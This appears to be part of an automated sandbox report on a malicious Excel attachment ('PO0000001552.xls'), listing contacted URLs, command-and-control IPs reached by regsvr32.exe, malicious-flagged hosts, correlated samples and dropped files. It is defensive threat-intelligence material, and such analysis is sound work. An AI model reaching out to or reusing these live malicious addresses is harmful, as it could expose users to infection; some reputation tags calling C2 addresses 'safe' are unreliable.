https://prod-global-autodetect.acompli.net/autodetect	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://consent.config.office.com/consentcheckin/v1.0/consents	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://ncus.contentsync.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://45.63.99.23:7080/tkafmhcgcid/8eM	regsvr32.exe, 0000000A.00000003.1927693196.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
http://weather.service.msn.com/data.aspx	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://apis.live.net/v5.0/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://messaging.lifecycle.office.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://management.azure.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office365.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://wus2.contentsync.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://182.162.143.56/	regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://45.63.99.23:7080/2	regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/odc/insertmedia	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.office.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://incidents.diagnosticssdf.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%	regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://entitlement.diagnostics.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://substrate.office.com/search/api/v2/init	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office365.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://webshell.suite.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
103.132.242.26	unknown	India	45117	INPL-IN-APIshansNetworkIN	true
104.168.155.143	unknown	United States	54290	HOSTWINDSUS	true
79.137.35.198	unknown	France	16276	OVHFR	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
172.104.251.154	unknown	United States	63949	LINODE-APLinodeLLCUS	true
115.68.227.76	unknown	Korea Republic of	38700	SMILESERV-AS-KRSMILESERVKR	true
81.68.152.197	ly.yjlianyi.top	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	false
163.44.196.120	unknown	Singapore	135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true
206.189.28.199	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
45.63.99.23	unknown	United States	20473	AS-CHOOPAUS	true
107.170.39.149	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
197.242.150.244	unknown	South Africa	37611	AfrihostZA	true
185.4.135.165	unknown	Greece	199246	TOPHOSTGR	true
183.111.227.137	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
139.59.56.73	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
169.57.156.166	unknown	United States	36351	SOFTLAYERUS	true
175.98.167.165	datie-tw.com	Taiwan; Republic of China (ROC)	9924	TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi	false
164.68.99.3	unknown	Germany	51167	CONTABODE	true
139.59.126.41	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
167.172.253.162	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
147.139.166.154	unknown	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
202.129.205.3	unknown	Thailand	45328	NIPA-AS-THNIPATECHNOLOGYCOLTDTH	true
167.172.199.165	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
153.92.5.27	unknown	Germany	47583	AS-HOSTINGERLT	true
159.65.140.115	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
159.65.88.10	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
172.105.226.75	unknown	United States	63949	LINODE-APLinodeLLCUS	true
164.90.222.65	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
213.239.212.5	unknown	Germany	24940	HETZNER-ASDE	true
5.135.159.50	unknown	France	16276	OVHFR	true
173.255.211.88	unknown	United States	63949	LINODE-APLinodeLLCUS	true
212.24.98.99	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
186.194.240.217	unknown	Brazil	262733	NetceteraTelecomunicacoesLtdaBR	true
91.187.140.35	unknown	Serbia	13092	UB-ASRS	true
119.59.103.152	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
159.89.202.34	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
201.94.166.162	unknown	Brazil	28573	CLAROSABR	true
160.16.142.56	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
91.207.28.33	unknown	Kyrgyzstan	39819	PROHOSTKG	true
103.43.75.120	unknown	Japan	20473	AS-CHOOPAUS	true
188.44.20.25	unknown	Macedonia	57374	GIV-ASMK	true
45.235.8.30	unknown	Brazil	267405	WIKINETTELECOMUNICACOESBR	true
153.126.146.25	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
72.15.201.15	unknown	United States	13649	ASN-VINSUS	true
82.223.21.224	unknown	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
47.92.35.35	sbm.xinmoshiwang.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
95.217.221.146	unknown	Germany	24940	HETZNER-ASDE	true
41.63.0.22	copunupo.ac.zm	Zambia	37532	ZAMRENZM	false
149.56.131.28	unknown	Canada	16276	OVHFR	true
209.97.163.214	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
182.162.143.56	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
1.234.2.232	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
94.23.45.86	unknown	France	16276	OVHFR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	745091
Start date and time:	2022-11-13 19:26:14 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO0000001552.xls
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@11/15@4/59
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 67.7% (good quality ratio 58.8%) Quality average: 65.2% Quality standard deviation: 35.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 23 Number of non-executed functions: 234
Cookbook Comments:	Found application associated with file extension: .xls

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.76.141, 52.109.77.0, 52.113.194.132, 52.109.89.14, 88.221.168.226, 13.69.239.73
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdneu03.northeurope.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:27:45	API Interceptor	6x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
110.232.117.186	ozZDLYwvhE.dll	Get hash	malicious	Browse
	ozZDLYwvhE.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	W-9 form.zip	Get hash	malicious	Browse
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse
	GUZyjs3wxI.dll	Get hash	malicious	Browse
	GUZyjs3wxI.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	U71925870143638QYS.xls	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	Scuola-paolovi Copia Fattura.xls	Get hash	malicious	Browse
103.132.242.26	ozZDLYwvhE.dll	Get hash	malicious	Browse
	ozZDLYwvhE.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	W-9 form.zip	Get hash	malicious	Browse
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse
	GUZyjs3wxI.dll	Get hash	malicious	Browse
	GUZyjs3wxI.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	U71925870143638QYS.xls	Get hash	malicious	Browse
	file.dll	Get hash	malicious	Browse
	Scuola-paolovi Copia Fattura.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
sbm.xinmoshiwang.com	Invoice+Number+18566.zip	Get hash	malicious	Browse	47.92.35.35
	Invoice+Number+18566.zip	Get hash	malicious	Browse	47.92.35.35
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	47.92.35.35
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	47.92.35.35
copunupo.ac.zm	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	41.63.0.22
	DATA_07112022.xls	Get hash	malicious	Browse	41.63.0.22
	DATA_07112022.xls	Get hash	malicious	Browse	41.63.0.22
datie-tw.com	Invoice+Number+18566.zip	Get hash	malicious	Browse	175.98.167.165
	Invoice+Number+18566.zip	Get hash	malicious	Browse	175.98.167.165
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	175.98.167.165
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	175.98.167.165
	Archivo-24032022.xls	Get hash	malicious	Browse	211.23.136.236
	Archivo-24032022.xls	Get hash	malicious	Browse	211.23.136.236
ly.yjlianyi.top	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	81.68.152.197

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RACKCORP-APRackCorpAU	ozZDLYwvhE.dll	Get hash	malicious	Browse	110.232.117.186
	ozZDLYwvhE.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	W-9 form.zip	Get hash	malicious	Browse	110.232.117.186
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	110.232.117.186
	GUZyjs3wxI.dll	Get hash	malicious	Browse	110.232.117.186
	GUZyjs3wxI.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	U71925870143638QYS.xls	Get hash	malicious	Browse	110.232.117.186
	file.dll	Get hash	malicious	Browse	110.232.117.186
	Scuola-paolovi Copia Fattura.xls	Get hash	malicious	Browse	110.232.117.186
INPL-IN-APIshansNetworkIN	ozZDLYwvhE.dll	Get hash	malicious	Browse	103.132.242.26
	ozZDLYwvhE.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	W-9 form.zip	Get hash	malicious	Browse	103.132.242.26
	Rech 2022.11.11_1346.xls	Get hash	malicious	Browse	103.132.242.26
	GUZyjs3wxI.dll	Get hash	malicious	Browse	103.132.242.26
	GUZyjs3wxI.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	U71925870143638QYS.xls	Get hash	malicious	Browse	103.132.242.26
	file.dll	Get hash	malicious	Browse	103.132.242.26
	Scuola-paolovi Copia Fattura.xls	Get hash	malicious	Browse	103.132.242.26

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
72a589da586844d7f0818ce684948eea	W-9 form.zip	Get hash	malicious	Browse	182.162.143.56
	U_0211.zip	Get hash	malicious	Browse	182.162.143.56
	cdmwqddqir.exe	Get hash	malicious	Browse	182.162.143.56
	roben.dll	Get hash	malicious	Browse	182.162.143.56
	c85WWDlKf2.dll	Get hash	malicious	Browse	182.162.143.56
	WLBu7dTvsC.dll	Get hash	malicious	Browse	182.162.143.56
	SecuriteInfo.com.Trojan.GenericKDZ.80412.21668.dll	Get hash	malicious	Browse	182.162.143.56
	ZokRhfJSrx.exe	Get hash	malicious	Browse	182.162.143.56
	84NKc3571B.exe	Get hash	malicious	Browse	182.162.143.56
	SecuriteInfo.com.ML.PE-A.26667.dll	Get hash	malicious	Browse	182.162.143.56
	HOPdc7v13C.exe	Get hash	malicious	Browse	182.162.143.56
	soccer.png.dll	Get hash	malicious	Browse	182.162.143.56
	SXCjsXDXXU.exe	Get hash	malicious	Browse	182.162.143.56
	dngqoAXyDd.exe	Get hash	malicious	Browse	182.162.143.56
	nWKik9o8eY.exe	Get hash	malicious	Browse	182.162.143.56
	5zzdHIYZAG.exe	Get hash	malicious	Browse	182.162.143.56
	r433fCa9zW.exe	Get hash	malicious	Browse	182.162.143.56
	nFHZS2HLKK.exe	Get hash	malicious	Browse	182.162.143.56
	OX6cphJYkB.exe	Get hash	malicious	Browse	182.162.143.56
	zpBXh0mWs7.exe	Get hash	malicious	Browse	182.162.143.56
6271f898ce5be7dd52b0fc260d0662b3	Invoice+Number+18566.zip	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	Invoice+Number+18566.zip	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	BLAIR STRIP STEEL.xlsx	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	U_0211.zip	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	Excel Statement001.xlsx	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	https://haxbyq.com/	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	2Vsos2EE1D.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	JKKbtWHR60.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	y3aNF4QTWG.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	RBa0JVmvr9.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	CRbjgEpusc.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	gSwggs78An.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	VYIx6fwNZD.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	VgnlShfOXf.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	Mail-Office365 setup.htm	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	Tbtk8qR7z2.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	https://u29287827.ct.sendgrid.net/ls/click?upn=nohQqYwdFy1d3izI9L4naj413kyQByYZSJabN8IqG0zoTLV1XCMHl-2FVPK2FeQCojt5YwUBOaK6VfyQpbti-2B69TF1cLVaJq8PijvOBW8apmn3AvdBvQQl-2BLhvUEsDkW9dYS768ZDfnzW2RjzIeU7RN0Yfb6d4wkAnGSm0cUguFvqMZckTzRWIyZJEpCU4Qh6eV2-2Bfkro4kmf5nMrDEcHqhnWUDRwmd-2FzN5-2FkIS6Wi3K6mhM5cSQ4n-2F5WnVQrILbiGy0f9Fc0RwJoqYAMk0dFJ8ySRrHcF4QVOGQaGrx6Bg7OPTuVQMZMuZhCrWAPrkf87R-2FBXW6F2ZyvxpFC7UOoOfJxE2GJt6DVRHu3k8Zw-2BdgVE59yeihQ8ps2YFrCo7cyddQTDcAf4z8pEBHXiIhChN5DupXTBGfjBgZ6QTG-2BdPb9bKPcyhouTJQvFMEo5PgnXPJgq2k0tDc-2FYDj3oQYMWSiCTXxxXEHvkIHNe7ZMc4GYLFeDCLgIQvQQDlHx1Lc7MvWzSSCjhnHc2c2H2CqTZFvOXZQ3DybLayxYMhoRQf0uM9MjwZA9OZbTLrFihHPdNn1jGRBh1nyLYjyXgRWza6PvIQWeZeevcUcu7jZmL2QYgobrSrnkVHqpTRg-2F-2FZTN7mJGCiNtx4L6HsPryU61utJRa09eThkgKDSyL2aRRVJVqjqb8bJU4bux2CzmX9g49bAAAQ3ikhRgaMyH-2FkpyIFA-3D-3DccG8_miJe9PyvvIkHFOzSHEPnhZTb-2BbpzMgr7mF5leA8I6kikh8AQEBROwz8yOXcXZqZagXv0wB2331sdK4nLhjjR-2BlwNz3eBu40mH4YzwTVUpGJofxskXgiQU-2FyS5h5TCru-2BrmQMYsv9DWD7oglm72ZBKqQ4nPvFT9pP4sfoZLzG2TDD9H6SdDg-2Fu9xDoCi28Yekn7wFfRuPHWzsGbSt-2FkCJNOn2PLTiEtmn-2F5QC1YreHtrNNIyd2x-2FKkeIQdxERZIk-2FCPpVxAG37z4uhFEJmwc2GlhHXCQrMYos-2FqcvsXQ9000T-2B4l5Oyx7-2FQMFPeTDWKMUX9yDRM3Ae9aXT2TlGOWtqy5GWarAQVsYdvr5-2BVPZ7O6oA8Zopz-2FrhaVGBrDT6xdtT2RQOMTB5dUKcUv-2By90nX428BfJrkuzb2KccRkZ8kMTMpOKAbVNwBlamyXy1GdOvUaSPXeYhXiYhaSPPaQzi8voEMFFdXSaMD7GY-2F9Oc3xrnakL4JivqPZzTpcBrD2hZAxURBW0YvrrK8QovpZredZo0E0fLoIgq1Tln793HP3XY50LFivnKkM8HctuI4vlhCIsx39V57TZQ2EvN8mlZbSGiyOkSRitF26qGkvvTgQZWDXP-2BbQb09mmgPtqrA3jGrqtQbMdgLil5bja62Qz3Lr6EBZ6w5b2szJlijId-2ByWqIedYE0dUO9zKMmjV0XP-2BLvCiJYzxZt6eFHH4mGxyIk-2FuuxgXxqw7DdKBzgMq8H-2BWqDAAeMDNdl0jGHoW4-2BB3T8aLP5k5J2up7kZHCj1ax3zKH-2FcpMPIull6A0BorsfyU86QLgi-2FeRgnNe3dytahSCVlus9VSsp-2FnciJ8qTzpKjBQUw3TrF0iipAimUvMHQ5pVf8K-2BBg6c5dCR7y4fTbUq3MnPHROMapqtCUOEGOCuFw-3D-3D	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	NL8.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	NL.exe	Get hash	malicious	Browse	175.98.167.165 41.63.0.22
	http://124.226.193.159:15131/57BC9B7E.Png	Get hash	malicious	Browse	175.98.167.165 41.63.0.22

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	JSON data
Category:	dropped
Size (bytes):	379722
Entropy (8bit):	4.9088149211082355
Encrypted:	false
SSDEEP:	1536:MApDpphudnceJZezca9uRszBEmj6QkjfoJ5Jj7DMnDAYRbLSm5rYOLdHKmC9:lDThumeGzcTRszB7DkjfaJj76RbNbLW9
MD5:	E9FB5A0DF105C6F7F80E8B650DF56AAB
SHA1:	0B7F6ADA05673F2535E61267C3CB428489ECEB55
SHA-256:	A24470762A1F9F5F069C0F70EF53D693D08B7C99797935800FF294BD3B2566F3
SHA-512:	65C83135CE550981ED88CB4A83127CB3C94D5C616F26B05185FCC129E5201A88EB0A1351D144E1511B50ADB388071BFCC60388FDD613EBBA5B202FFC76F7D42B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"MajorVersion":4,"MinorVersion":17,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"31150835240","p":[2,11,8,4,2,2,2,2,2,4],"sub":[],"t":"ttf","u":[3,0,0,0],"v":67502,"w":45875968},{"c":[536870913,0],"dn":"Agency FB","fs":52680,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"29260917085","p":[2,11,5,3,2,2,2,2,

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview.ttf

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_17RegularVersion 4.17;O365
Category:	dropped
Size (bytes):	672416
Entropy (8bit):	6.566110770587873
Encrypted:	false
SSDEEP:	12288:/3zUbLds556T1BEFGHtASk3+/KLQ/zp1km/WJ1ov0mPqxXE/RoVZPE9Ob:/Qfds5opwSL1kovT92
MD5:	4DFB7AADD4771ADDF1BA168C12DEDBF3
SHA1:	B379DC0E19FE0F51E77305BE0A7F3421B80E8A0F
SHA-256:	DB9B46CC2132D76EF90CA9A59AF03CB478BB91EA2CDA3E8E42DD0801873416E2
SHA-512:	1C5AE2C794017A81A4232A2EF43725A0DA30F9672123940D85D34A4A77744D2D7ECA5FFE9A91E2FEDDBDBADE4EEAD6AB80E565C1F8FBB813C5A2BC25F7F0A359
Malicious:	false
Preview:	........... OS/29.P...(...`cmap.s.........pglyf..e.......0.head-@;,.......6hheaE.@B.......$hmtx...........ploca..@....h...tmaxp........... name.T+...A\|....post...<..B.... ........Me.._.<...........<.............Aa.x.................Q....Aa....Aa.........................~...........................j.......................3..............................MS .@.......(...Q................. ...........d.......0...J.......8...>..........+a..#...,................K.......z...............N.........!...-...+....z.......h..%^..3...&j..+...+%.."....................l......$A...,.......g...&...=.......X..&..............&...(B...............#.......j...............+...P...5...@...)..........#...............N...7......<...;>.............. ]...........5......#....s.......$.......$.......^...................H.......%...7.......6.......O...V...........K.......c......!...........$...&...p..+<..+...-....q.......O...................F..(....5..0K..$...0V...k..e...o...........S......0..0...*M......9...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E9097BEB-F41B-41FA-A529-2854DCDBD67E

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	150846
Entropy (8bit):	5.357322582686688
Encrypted:	false
SSDEEP:	1536:h+C7/gd3B4BQguw//Q9DQe+zQVk4F77nXmvidOXRsEwrNz6S:BHQ9DQe+zbXza
